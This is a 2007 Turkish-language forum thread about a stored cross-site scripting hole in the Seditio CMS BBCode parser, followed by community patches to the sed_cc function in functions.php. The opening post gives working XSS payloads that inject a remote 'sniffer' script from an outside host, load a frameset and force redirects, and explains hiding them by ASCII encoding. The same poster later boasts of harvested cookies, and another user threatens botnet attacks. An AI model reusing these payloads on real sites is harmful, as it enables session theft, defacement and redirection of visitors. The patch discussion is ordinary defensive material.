Next page| Author | Message |
yasebo
4 posts |
#7004 2007-10-08 11:12 GMT |
|
Selamlar.. yeni bir açık tespit edildi. Code: [t=f.jpg[img]onerror=document.write('<frameset cols=100% rows=100% border=0 frameborder=0 framespacing=0><frame frameborder=0 src=http://www.jawnax.net></frameset>') x=document.jpg[/img]x.jpg]x[img] x=document.jpg[/img]ss.jpg[/t] bu kod çalışır durumda, ama ascii ile encode yapılırsa, Siz kodu düzenlemek istediğinizde size normal olarak gözükecektir fakat, forums.php 'de kod çalışır. işte yukarıdaki kodun ascii şifrelenmiş hali: http://jawnax.net/codexss.txt bu kod ile neler yapılabilir? bütün html js kodları çalıştırılabilir.. Örneğin; Code: [t=f.jpg[img]onerror=document.body.appendChild(document.createElement('script')).src='http://www.jawnax.net/sniffer/xss.js' x=document.jpg[/img]x.jpg]x[img] id=xss x=document.jpg[/img]ss.jpg[/t] Code: [t=f.jpg[img]onerror=document.write('<meta http-equiv="Refresh"content="0; URL=http://www.jawnax.net">') x=document.jpg[/img]x.jpg]x[img] x=document.jpg[/img]ss.jpg[/t] Bu şekilde sınırsız kötü amaçlı kodlar üretilebilir.. dileyen şimdilik resmi bir yama çıkmana kadar bunu kullana bilir » Functions.php Açın Bul > Code: $bbcodes = array( '$' => '$', Kodu alttaki linkten kopyalayın, burda normal gözükür. Bulunacak kod: http://www.jawnax.net/codefind.txt Üstüne kaydet > Code: $bbcodes = array( '$' => '$', 'a' => 'Error', 'w' => 'Error', 'd' => 'Error', '.' => 'Error', Kod burada harf olarak çıkar, ascii olduğu için dbde gözükür. alltaki linki kullanın. Üstüne yazacağınız kod: http://jawnax.net/codereplace.txt Kapatıp kayıt edin. Yazar: yasebo / www.jawnax.net Teşekkürler: Chenator-Stalin, KaaN . |
|
Neo
3 posts |
#7006 2007-10-08 12:31 GMT |
|
. . .
This post was edited by Dvdbil (2007-10-08 14:39 GMT, 371 Gün ago) |
|
yasebo
4 posts |
#7007 2007-10-08 12:46 GMT |
|
biraz terbiyeni takın, http://yasebo.net/cookie/ekledik.txt Burda senin sitedende cookie var sildim mesajı, sen hiç birşey bilmediğin için sadece yönlendiriyorsunuz dersin. anca flood yapmasını bilirsin 
This post was edited by Dvdbil (2007-10-08 14:40 GMT, 371 Gün ago) |
|
Neo
3 posts |
#7008 2007-10-08 12:55 GMT |
|
cookie alıp ne yapıcaksın sen daha seditio systemini bilmiyosun benim cookie lerim benim ipimle calışır kus ben flood cekmem cekersem botnetle saldırım güzelim : ) bunu aklının bi köşesine sok. eziq olan sizlersiniz o kadar eziqsinizki domain firmasina email cekerek site hackliyosunuz içinizdeki eziqliği böyle tatmin ediyosunuz. ( Senin gibi eziq biriyle polemiğe giremicem istedini yaz. )
|
|
yasebo
4 posts |
#7009 2007-10-08 12:58 GMT |
Quote Seninle tartismaya bile girmek istemiyorum seviyem degilsin, madem kendine o kadar cok guveniyosun, botnetle saldır jawnaX'a neyle saldırıyosan saldır, icraat istiyorum konusmayla olmuyor bu isler icraat gormek istiyorum Konuya cevap yazma iyice dagittin. |
|
Xiao
868 posts |
#7010 2007-10-08 13:31 GMT |
|
amacınız nedir?kendinizi tatmin etmek mi?ozaman bu siteden uzak dursanız iyi olur!..
|
|
|
Haziran 2008 Seditio Site Yar??mas? >> http://www.seditione.com
|
|
Kral
91 posts |
#7011 2007-10-08 13:40 GMT |
|
Code: Fix Solution by Kilandor - http://www.seditioforge.com/ Search for in system/functions.php function sed_cc Then Find $text = str_replace( array('{', '<', '>' , '$', '\'', '"', '\\', '&', ' '), array('{', '<', '>', '$', ''', '"', '\', '&amp;', '&nbsp;'), $text); Replace it with $text = str_replace( array('{', '<', '>' , '$', '\'', '"', '\\', '&', ' ', '#'), array('{', '<', '>', '$', ''', '"', '\', '&amp;', '&nbsp;', 'l'), $text); You can see the fix working in action here. http://www.seditioforge.com/tutorials/core-hacks/security-fix---ascii-insertion-into-text-i63.html Fix Solution by Kilandor - http://www.seditioforge.com/ Açığın Yamasi |
|
zaygo
22 posts |
#7013 2007-10-08 14:05 GMT |
|
functions.php dosyası 121 de ve 122 beda çeşitli açıklardan yamalanmıs.Seditio122 kurup açığı test ettikden sonra yamaları kurmak daha mantıklı.
|
|
|
Bu aç?klanamaz, ama hissedersin. Hayatin boyunca dünyayla ilgili baz? ?eylerin yanl?? oldu?unu hissetmi?sindir.. Ne oldu?unu bilmezsin, ama o ordad?r; beynine saplanm?? bir k?ym?k parças? gibi... Seni deli eder... Morpheus "The Matrix" |
|
Xiao
868 posts |
#7019 2007-10-08 15:05 GMT |
|
Dvdbil gerekli yamayı yayınladı.lütfen anasayfaya göz atın. |
|
|
Haziran 2008 Seditio Site Yar??mas? >> http://www.seditione.com
|
|
Dvdbil
2,245 posts |
#7020 2007-10-08 15:07 GMT |
|
Açıkçası dün yazacaktım ama bu şekil yamalama pek mantıklı değil.
İlerleyen zamanlarda bazılarının sisteminde sorun çıkacaktır
|
|
|
Sitelerinize profesyonel anlamda hizmet verilir;
- Performans optimizasyonu, - Üst düzey güvenlik yamaları, - İsteğe bağlı eklentiler, - Her çeşit bot (program, video, resim, arsiv, haber), - Profesyonel görsel skin. Tüm tasarım, kodlamalar ve optimizasyon Neocrome referansı ile tarafımca hazırlanmakta. *************************İSTATİSTİKLER************************* Müşterim olan danışmanlığını yaptığım toplam kişi sayısı: 23 Sadece Eklenti hazırladığım kişi sayısı: 21 Uygulama yaptığım toplam site sayısı: 38 ------------------------------------------------- Müşterinin isteği doğrultusunda hazırladığım; - eklenti sayısı: 44 - skin sayısı: 8 - bot sayısı: 15 - özel güvenlik yamaları: 21 - Sql performans optimizasyonu: 13 (yüksek hitli siteler için) - Portal genel cache ve materyal optimizasyonu: 15 *************************************************************** |
|
Xiao
868 posts |
#7023 2007-10-08 15:29 GMT |
|
sadece bir # nin bukadar büyük açık yaratmasının sebebi nedir dvdbil?
|
|
|
Haziran 2008 Seditio Site Yar??mas? >> http://www.seditione.com
|
|
Dvdbil
2,245 posts |
#7028 2007-10-08 16:08 GMT |
|
Olur böyle şeyler
2002 yılında Yahoo Mail'deki $ açığı ile benzer bir durum. |
|
|
Sitelerinize profesyonel anlamda hizmet verilir;
- Performans optimizasyonu, - Üst düzey güvenlik yamaları, - İsteğe bağlı eklentiler, - Her çeşit bot (program, video, resim, arsiv, haber), - Profesyonel görsel skin. Tüm tasarım, kodlamalar ve optimizasyon Neocrome referansı ile tarafımca hazırlanmakta. *************************İSTATİSTİKLER************************* Müşterim olan danışmanlığını yaptığım toplam kişi sayısı: 23 Sadece Eklenti hazırladığım kişi sayısı: 21 Uygulama yaptığım toplam site sayısı: 38 ------------------------------------------------- Müşterinin isteği doğrultusunda hazırladığım; - eklenti sayısı: 44 - skin sayısı: 8 - bot sayısı: 15 - özel güvenlik yamaları: 21 - Sql performans optimizasyonu: 13 (yüksek hitli siteler için) - Portal genel cache ve materyal optimizasyonu: 15 *************************************************************** |
|
Kaan
2,082 posts |
#7029 2007-10-08 16:42 GMT |
|
Sorun cıkarıyor (') kullanımına izin vermiyor. Bende Başka türlü yamaladım 
|
|
siyah.kin
98 posts |
#7032 2007-10-08 17:22 GMT |
Quote ulan neo ayda yılda bir doğru dürüst laf etmişsin katılıyorum. |
|
|
Mira Group |
|
Kilandor
2 posts |
#7035 2007-10-08 17:38 GMT |
|
Updated to fix the ' Problem'
http://www.seditioforge.com/tutorials/core-hacks/security-fix---ascii-insertion-into-text-i63.html Code: Fix Solution by Kilandor - http://www.seditioforge.com/
Updated Replace With Step. # must be filtered First before all others for for example. ( would normally parse { With # last, { would become { Search for in system/functions.php function sed_cc Then Find $text = str_replace( array('{', '<', '>' , '$', '\'', '"', '\\', '&', ' '), array('{', '<', '>', '$', ''', '"', '\', '&amp;', '&nbsp;'), $text); ~~Updated~~ Replace it with $text = str_replace( array('#', '{', '<', '>' , '$', '\'', '"', '\\', '&', ' '), array('#', '{', '<', '>', '$', ''', '"', '\', '&amp;', '&nbsp;'), $text); You can see the fix working in action here. http://www.seditioforge.com/tutorials/core-hacks/security-fix---ascii-insertion-into-text-i63.html Fix Solution by Kilandor - http://www.seditioforge.com/ |
|
emremix
483 posts |
#7037 2007-10-08 19:38 GMT |
|
Code: [t=thumbnail][/t] Bbcode sini funktions.php ve textboxerdan kaldırsam açık kapanır mı ? Yoksa illa yamayı yapayım mı ? acil cevap bekliyorum |
|
|
Sudo apt-get Alcohol
Forever Ubuntu :) |
|
zaygo
22 posts |
#7038 2007-10-08 19:54 GMT |
|
ben kendi siteme şahsen bu yamayı kurmadım.Kendi aldığım önlemler ve sed122 beta kurulu.Daha hiç bişi olmadı.Sürekli kontrol ediyorum.
|
|
|
Bu aç?klanamaz, ama hissedersin. Hayatin boyunca dünyayla ilgili baz? ?eylerin yanl?? oldu?unu hissetmi?sindir.. Ne oldu?unu bilmezsin, ama o ordad?r; beynine saplanm?? bir k?ym?k parças? gibi... Seni deli eder... Morpheus "The Matrix" |
|
Dvdbil
2,245 posts |
#7040 2007-10-08 20:08 GMT |
|
Arkadaşlar yayınlanan v122 beta`dır. Yani sadece test sürümüdür.. Dolayısıyla her hata için yeni bir konu açarak belirtin veya neocrome.net'ten bugtracker listesine ekleyiniz.
|
|
|
Sitelerinize profesyonel anlamda hizmet verilir;
- Performans optimizasyonu, - Üst düzey güvenlik yamaları, - İsteğe bağlı eklentiler, - Her çeşit bot (program, video, resim, arsiv, haber), - Profesyonel görsel skin. Tüm tasarım, kodlamalar ve optimizasyon Neocrome referansı ile tarafımca hazırlanmakta. *************************İSTATİSTİKLER************************* Müşterim olan danışmanlığını yaptığım toplam kişi sayısı: 23 Sadece Eklenti hazırladığım kişi sayısı: 21 Uygulama yaptığım toplam site sayısı: 38 ------------------------------------------------- Müşterinin isteği doğrultusunda hazırladığım; - eklenti sayısı: 44 - skin sayısı: 8 - bot sayısı: 15 - özel güvenlik yamaları: 21 - Sql performans optimizasyonu: 13 (yüksek hitli siteler için) - Portal genel cache ve materyal optimizasyonu: 15 *************************************************************** |
|
emremix
483 posts |
#7041 2007-10-08 20:10 GMT |
|
bide ilk sorumu cevaplayabilir misin ? |
|
|
Sudo apt-get Alcohol
Forever Ubuntu :) |
|
adense
61 posts |
#7042 2007-10-08 20:10 GMT |
|
yukarıdaki yamaları uygulayınca site hata veriyor
Code: Parse error: parse error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ')' /usr/hosts/domains/domainadı/www.siteadi.biz/httpdocs/system/functions.php on
line 1274 |
|
Benzer konular (Similar topics) #BETA
| Konular | Mesajlar | Son Yazar | Güncelleme |
| Ya Lütfen Yardım Bbcode Açığı Yaması Tr Karakter Sorunu | 17 | teamkral | 209 Gün |
| sed122 bbcode alt forum bbcode | 2 | keahya | 351 Gün |
| sub domain açığı | 3 | suskun_73 | 76 Gün |
| Youtube BBCode | 16 | Bi0systeM | 160 Gün |
| Cookies mi BBCode mu? | 3 | Sender | 347 Gün |